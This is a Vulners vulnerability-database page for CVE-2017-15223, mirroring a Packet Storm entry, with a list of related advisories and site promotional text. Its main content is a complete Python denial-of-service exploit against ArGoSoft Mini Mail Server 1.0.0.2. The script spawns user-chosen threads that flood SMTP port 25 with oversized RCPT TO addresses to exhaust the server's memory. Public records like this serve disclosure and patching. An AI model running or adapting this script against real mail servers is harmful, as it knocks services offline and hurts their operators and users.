Vulners
Lucene search
ArGoSoft Mini Mail Server 1.0.0.2 Denial Of Service
🗓️ 25 Oct 2017 00:00:00Reported by Berk Cem GokselType 
packetstorm🔗 packetstormsecurity.com👁 27 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service Exploit | 23 Oct 201700:00 | – | zdt |
 | ArGoSoft Mini Mail Server Denial of Service Vulnerability | 25 Oct 201700:00 | – | cnvd |
 | CVE-2017-15223 | 24 Oct 201717:00 | – | cve |
 | CVE-2017-15223 | 24 Oct 201717:00 | – | cvelist |
 | ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service | 21 Oct 201700:00 | – | exploitdb |
 | ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service | 21 Oct 201700:00 | – | exploitpack |
 | CVE-2017-15223 | 24 Oct 201717:29 | – | nvd |
 | CVE-2017-15223 | 24 Oct 201717:29 | – | osv |
 | Denial of service | 24 Oct 201717:29 | – | prion |
`#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
#
# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
# and earlier allows remote attackers to waste CPU resources (memory
# consumption) via unspecified vectors.
####################################
# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
# Date: 2017-10-21
# Exploit Author: Berk Cem GAPksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.argosoft.com
# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
# Version: 1.0.0.2
# Tested on: Windows 10
# Category: Windows Remote Denial-of-Service
# CVE : CVE-2017-15223
import socket
from threading import Thread
def data():
ip = '127.0.0.1'
port = 25
counter = 50
string = '&'
while True:
try:
if counter >= 10000:
counter = 0
else:
counter = counter + 50
A = (string * counter) + '[email protected]'
print "String lenght: " + str(len(A))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, port))
sock.send('HELO localhost\r\n' + 'MAIL FROM: [email protected]\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
sock.recv(1024)
sock.close()
except Exception as e:
continue
def main():
iterations = int(input("Threads: "))
for i in range(iterations):
t = Thread(target=data)
t.start()
if __name__ == '__main__':
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Oct 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
EPSS0.17176